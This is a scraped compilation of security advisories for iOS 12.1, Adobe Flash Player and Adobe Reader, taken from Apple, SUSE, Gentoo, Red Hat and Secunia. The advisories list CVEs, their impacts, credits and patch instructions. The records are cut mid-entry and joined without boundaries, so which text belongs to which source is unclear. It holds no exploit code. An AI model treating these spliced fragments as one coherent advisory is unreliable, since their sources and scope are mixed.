iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted vcf file may lead to a denial of service Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2018-4365: an anonymous researcher CoreCrypto Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker may be able to exploit a weakness in the Miller-Rabin primality test to incorrectly identify prime numbers Description: An issue existed in the method for determining prime numbers. CVE-2018-4398: Martin Albrecht, Jake Massimo and Kenny Paterson of Royal Holloway, University of London, and Juraj Somorovsky of Ruhr University, Bochum FaceTime Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A remote attacker may be able to leak memory Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4366: Natalie Silvanovich of Google Project Zero FaceTime Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A remote attacker may be able to initiate a FaceTime call causing arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4367: Natalie Silvanovich of Google Project Zero Graphics Driver Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A remote attacker may be able to initiate a FaceTime call causing arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4384: Natalie Silvanovich of Google Project Zero ICU Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted string may lead to heap corruption Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4394: an anonymous researcher IOHIDFamily Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4427: Pangu Team IPSec Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: An out-of-bounds read was addressed with improved input validation. CVE-2018-4371: Tim Michaud (@TimGMichaud) of Leviathan Security Group Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed by removing the vulnerable code. CVE-2018-4420: Mohamed Ghannam (@_simo36) Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2018-4413: Juwei Lin (@panicaII) of TrendMicro Mobile Security Team Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4419: Mohamed Ghannam (@_simo36) Messages Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted text message may lead to UI spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4390: Rayyan Bijoora (@Bijoora) of The City School, PAF Chapter CVE-2018-4391: Rayyan Bijoora (@Bijoora) of The City School, PAF Chapter NetworkExtension Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Connecting to a VPN server may leak DNS queries to a DNS proxy Description: A logic issue was addressed with improved state management. CVE-2018-4369: an anonymous researcher Notes Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local attacker may be able to share items from the lock screen Description: A lock screen issue allowed access to the share function on a locked device. This issue was addressed by restricting options offered on a locked device. CVE-2018-4388: videosdebarraquito Safari Reader Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2018-4374: Ryan Pickren (ryanpickren.com) Safari Reader Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting Description: A cross-site scripting issue existed in Safari. CVE-2018-4377: Ryan Pickren (ryanpickren.com) Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted S/MIME signed message may lead to a denial of service Description: A validation issue was addressed with improved logic. CVE-2018-4400: Yukinobu Nagayasu of LAC Co., Ltd. VoiceOver Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local attacker may be able to view photos from the lock screen Description: A lock screen issue allowed access to photos via Reply With Message on a locked device. CVE-2018-4387: videosdebarraquito WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to address bar spoofing Description: A logic issue was addressed with improved state management. CVE-2018-4385: an anonymous researcher WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4409: Sabri Haddouche (@pwnsdx) of Wire Swiss GmbH WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to code execution Description: A memory corruption issue was addressed with improved validation. CVE-2018-4378: an anonymous researcher, zhunki of 360 ESG Codesafe Team WiFi Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved validation. CVE-2018-4368: Milan Stute and Alex Mariotto of Secure Mobile Networking Lab at Technische UniversitA$?t Darmstadt Additional recognition Certificate Signing We would like to acknowledge YiAit Can YILMAZ (@yilmazcanyigit) for their assistance. iBooks We would like to acknowledge Sem VoigtlA$?nder of Fontys Hogeschool ICT for their assistance. Security We would like to acknowledge Marinos Bernitsas of Parachute for their assistance. Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 12.1". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgUpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HpTw/7 Bkh9bUEddgGUejpnjO1DRiBlHUDQMssF7nG2LM5JOcCDoLkeHSdcr86KnR7VEyYp qSllLijO9ZzrLtJuZSEelDCi+eL1Ojk3kP/6ZeMRIxDkYItR7EFWQUK71wcInk5k qPZp2FnKU3qx0Ax7wzQi3GTQk8CZCVWcuCzh0UA0Nc3rgk0bf29+7AKmgiTaT2Ra Yo4bRIXRuyi+jE39hN4x41vwjSbaxr5EZb9rvL5HT6Idipcoc9aS+sDbsscXjz/5 9WHlwAB5mxeqO3vY5WNlLhOUXXqMVRfPC/qxQocl86r2AE9jJedQFl/p9qpG59we FrAejzKTU+1GpI4dGY6puAJval5DlcedWBxsyBxFAT04HdY0pfgF4zpFDTHRj6no HnEvtF+pNgqX2OTTLCXtMG4r5c7b1yrOPYkM6FS+BjLV2H0X9n3PpvX0qvAqSTn3 RGbkJqHFV4G/DwsWUQQOOXNCthEwhzbT2n7mc+rCtN1WPUu99fGGZusMAqetmVvl hgUIVPp9+ZHs64BlTzD+xu8e6jyoJ8YoPD9a/r+ENXxHJz6Mr8Jd/E2ZesN5tWpi sO3ajUx/d158T4jfAvIE8tJGungUgehPVIIR5120nYxHc6gMUAYzirwFptfvSpb8 HWzMnE69KcP9Lnhtgp7fRv+HKpJmrsjOLKyldZzjZlA= =cetI -----END PGP SIGNATURE-----
var-201108-0183 Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2415. Adobe Flash Player and Adobe AIR Contains a buffer overflow vulnerability. This vulnerability CVE-2011-2130 , CVE-2011-2134 , CVE-2011-2137 ,and CVE-2011-2415 Is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ______________________________________________________________________________ SUSE Security Announcement Package: flash-player Announcement ID: SUSE-SA:2011:033 Date: Wed, 10 Aug 2011 14:00:00 +0000 Affected Products: SUSE Linux Enterprise Desktop 11 SP1 SUSE Linux Enterprise Desktop 10 SP4 Vulnerability Type: remote code execution CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) SUSE Default Package: yes Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135 CVE-2011-2136, CVE-2011-2137, CVE-2011-2138 CVE-2011-2139, CVE-2011-2140, CVE-2011-2414 CVE-2011-2415, CVE-2011-2416, CVE-2011-2417 CVE-2011-2425 Content of This Advisory: 1) Security Vulnerability Resolved: remote code execution Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none 6) Authenticity Verification and Additional Information ______________________________________________________________________________ 1) Problem Description and Brief Discussion Flash-Player was updated to version 10.3.188.5 to fix various buffer and integer overflows: - CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) Earlier flash-player versions can be exploited to execute arbitrary code remotely with the privileges of the attacked user. For more details see: http://www.adobe.com/support/security/bulletins/apsb11-21.html 2) Solution or Work-Around none 3) Special Instructions and Notes Pleease restart your browser. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST "Online Update" module or the "zypper" commandline tool. The package and patch management stack will detect which updates are required and automatically perform the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv <file.rpm> to apply the update, replacing <file.rpm> with the filename of the downloaded RPM package. Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web: SUSE Linux Enterprise Desktop 10 SP4 http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900 SUSE Linux Enterprise Desktop 11 SP1 http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10 ______________________________________________________________________________ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none ______________________________________________________________________________ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify <file> replacing <file> with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made <DATE> using RSA key ID 3D25D3D9 gpg: Good signature from "SuSE Security Team <security@suse.de>" where <DATE> is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with. The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command rpm -v --checksig <file.rpm> to verify the signature of the package, replacing <file.rpm> with the filename of the RPM package downloaded. The package is unmodified if it contains a valid signature from build@suse.de with the key ID 9C800ACA. This key is automatically imported into the RPM database (on RPMv4-based distributions) and the gpg key ring of 'root' during installation. You can also find it on the first installation CD and at the end of this announcement. - SUSE runs two security mailing lists to which any interested party may subscribe: opensuse-security@opensuse.org - General Linux and SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an e-mail to <opensuse-security+subscribe@opensuse.org>. opensuse-security-announce@opensuse.org - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an e-mail to <opensuse-security-announce+subscribe@opensuse.org>. The <security@suse.de> public key is listed below. ===================================================================== ______________________________________________________________________________ The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, the clear text signature should show proof of the authenticity of the text. SUSE Linux Products GmbH provides no warranties of any kind whatsoever with respect to the information contained in this security advisory. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10" References ========== [ 1 ] APSA11-01 http://www.adobe.com/support/security/advisories/apsa11-01.html [ 2 ] APSA11-02 http://www.adobe.com/support/security/advisories/apsa11-02.html [ 3 ] APSB11-02 http://www.adobe.com/support/security/bulletins/apsb11-02.html [ 4 ] APSB11-12 http://www.adobe.com/support/security/bulletins/apsb11-12.html [ 5 ] APSB11-13 http://www.adobe.com/support/security/bulletins/apsb11-13.html [ 6 ] APSB11-21 https://www.adobe.com/support/security/bulletins/apsb11-21.html [ 7 ] APSB11-26 https://www.adobe.com/support/security/bulletins/apsb11-26.html [ 8 ] CVE-2011-0558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558 [ 9 ] CVE-2011-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559 [ 10 ] CVE-2011-0560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560 [ 11 ] CVE-2011-0561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561 [ 12 ] CVE-2011-0571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571 [ 13 ] CVE-2011-0572 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572 [ 14 ] CVE-2011-0573 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573 [ 15 ] CVE-2011-0574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574 [ 16 ] CVE-2011-0575 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575 [ 17 ] CVE-2011-0577 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577 [ 18 ] CVE-2011-0578 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578 [ 19 ] CVE-2011-0579 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579 [ 20 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 21 ] CVE-2011-0607 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607 [ 22 ] CVE-2011-0608 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608 [ 23 ] CVE-2011-0609 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609 [ 24 ] CVE-2011-0611 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611 [ 25 ] CVE-2011-0618 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618 [ 26 ] CVE-2011-0619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619 [ 27 ] CVE-2011-0620 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620 [ 28 ] CVE-2011-0621 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621 [ 29 ] CVE-2011-0622 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622 [ 30 ] CVE-2011-0623 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623 [ 31 ] CVE-2011-0624 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624 [ 32 ] CVE-2011-0625 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625 [ 33 ] CVE-2011-0626 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626 [ 34 ] CVE-2011-0627 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627 [ 35 ] CVE-2011-0628 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628 [ 36 ] CVE-2011-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107 [ 37 ] CVE-2011-2110 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110 [ 38 ] CVE-2011-2125 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 39 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 40 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 41 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 42 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 43 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 44 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 45 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 46 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 47 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 48 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 49 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 50 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 51 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 52 ] CVE-2011-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426 [ 53 ] CVE-2011-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427 [ 54 ] CVE-2011-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428 [ 55 ] CVE-2011-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429 [ 56 ] CVE-2011-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430 [ 57 ] CVE-2011-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201110-11.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: acroread security update Advisory ID: RHSA-2011:1434-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html Issue date: 2011-11-08 CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2424 CVE-2011-2425 CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2429 CVE-2011-2430 CVE-2011-2431 CVE-2011-2432 CVE-2011-2433 CVE-2011-2434 CVE-2011-2435 CVE-2011-2436 CVE-2011-2437 CVE-2011-2438 CVE-2011-2439 CVE-2011-2440 CVE-2011-2442 CVE-2011-2444 ===================================================================== 1. Summary: Updated acroread packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Desktop version 4 Extras - i386, x86_64 Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: Adobe Reader allows users to view and print documents in Portable Document Format (PDF). This update fixes multiple security flaws in Adobe Reader. These flaws are detailed on the Adobe security page APSB11-24, listed in the References section. A specially-crafted PDF file could cause Adobe Reader to crash or, potentially, execute arbitrary code as the user running Adobe Reader when opened. These flaws are detailed on the Adobe security pages APSB11-21 and APSB11-26, listed in the References section. A PDF file with an embedded, specially-crafted SWF file could cause Adobe Reader to crash or, potentially, execute arbitrary code as the user running Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135, CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140, CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424, CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430) A flaw in Adobe Flash Player could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially-crafted web page. (CVE-2011-2429) All Adobe Reader users should install these updated packages. They contain Adobe Reader version 9.4.6, which is not vulnerable to these issues. All running instances of Adobe Reader must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21) 740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26 740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26 740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26 749381 - acroread: multiple code execution flaws (APSB11-24) 6. Package List: Red Hat Enterprise Linux AS version 4 Extras: i386: acroread-9.4.6-1.el4.i386.rpm acroread-plugin-9.4.6-1.el4.i386.rpm x86_64: acroread-9.4.6-1.el4.i386.rpm Red Hat Desktop version 4 Extras: i386: acroread-9.4.6-1.el4.i386.rpm acroread-plugin-9.4.6-1.el4.i386.rpm x86_64: acroread-9.4.6-1.el4.i386.rpm Red Hat Enterprise Linux ES version 4 Extras: i386: acroread-9.4.6-1.el4.i386.rpm acroread-plugin-9.4.6-1.el4.i386.rpm x86_64: acroread-9.4.6-1.el4.i386.rpm Red Hat Enterprise Linux WS version 4 Extras: i386: acroread-9.4.6-1.el4.i386.rpm acroread-plugin-9.4.6-1.el4.i386.rpm x86_64: acroread-9.4.6-1.el4.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: acroread-9.4.6-1.el5.i386.rpm acroread-plugin-9.4.6-1.el5.i386.rpm x86_64: acroread-9.4.6-1.el5.i386.rpm acroread-plugin-9.4.6-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: acroread-9.4.6-1.el5.i386.rpm acroread-plugin-9.4.6-1.el5.i386.rpm x86_64: acroread-9.4.6-1.el5.i386.rpm acroread-plugin-9.4.6-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: acroread-9.4.6-1.el6.i686.rpm acroread-plugin-9.4.6-1.el6.i686.rpm x86_64: acroread-9.4.6-1.el6.i686.rpm acroread-plugin-9.4.6-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: acroread-9.4.6-1.el6.i686.rpm acroread-plugin-9.4.6-1.el6.i686.rpm x86_64: acroread-9.4.6-1.el6.i686.rpm acroread-plugin-9.4.6-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: acroread-9.4.6-1.el6.i686.rpm acroread-plugin-9.4.6-1.el6.i686.rpm x86_64: acroread-9.4.6-1.el6.i686.rpm acroread-plugin-9.4.6-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-2130.html https://www.redhat.com/security/data/cve/CVE-2011-2134.html https://www.redhat.com/security/data/cve/CVE-2011-2135.html https://www.redhat.com/security/data/cve/CVE-2011-2136.html https://www.redhat.com/security/data/cve/CVE-2011-2137.html https://www.redhat.com/security/data/cve/CVE-2011-2138.html https://www.redhat.com/security/data/cve/CVE-2011-2139.html https://www.redhat.com/security/data/cve/CVE-2011-2140.html https://www.redhat.com/security/data/cve/CVE-2011-2414.html https://www.redhat.com/security/data/cve/CVE-2011-2415.html https://www.redhat.com/security/data/cve/CVE-2011-2416.html https://www.redhat.com/security/data/cve/CVE-2011-2417.html https://www.redhat.com/security/data/cve/CVE-2011-2424.html https://www.redhat.com/security/data/cve/CVE-2011-2425.html https://www.redhat.com/security/data/cve/CVE-2011-2426.html https://www.redhat.com/security/data/cve/CVE-2011-2427.html https://www.redhat.com/security/data/cve/CVE-2011-2428.html https://www.redhat.com/security/data/cve/CVE-2011-2429.html https://www.redhat.com/security/data/cve/CVE-2011-2430.html https://www.redhat.com/security/data/cve/CVE-2011-2431.html https://www.redhat.com/security/data/cve/CVE-2011-2432.html https://www.redhat.com/security/data/cve/CVE-2011-2433.html https://www.redhat.com/security/data/cve/CVE-2011-2434.html https://www.redhat.com/security/data/cve/CVE-2011-2435.html https://www.redhat.com/security/data/cve/CVE-2011-2436.html https://www.redhat.com/security/data/cve/CVE-2011-2437.html https://www.redhat.com/security/data/cve/CVE-2011-2438.html https://www.redhat.com/security/data/cve/CVE-2011-2439.html https://www.redhat.com/security/data/cve/CVE-2011-2440.html https://www.redhat.com/security/data/cve/CVE-2011-2442.html https://www.redhat.com/security/data/cve/CVE-2011-2444.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb11-21.html http://www.adobe.com/support/security/bulletins/apsb11-24.html http://www.adobe.com/support/security/bulletins/apsb11-26.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q 0+KSTL2IByBwtP8+xfPmUNE= =qFq6 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ---------------------------------------------------------------------- The Secunia CSI 5.0 Beta - now available for testing Find out more, take a free test drive, and share your opinion with us: http://secunia.com/blog/242 ---------------------------------------------------------------------- TITLE: Red Hat update for flash-plugin SECUNIA ADVISORY ID: SA45593 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45593/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45593 RELEASE DATE: 2011-08-12 DISCUSS ADVISORY: http://secunia.com/advisories/45593/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE 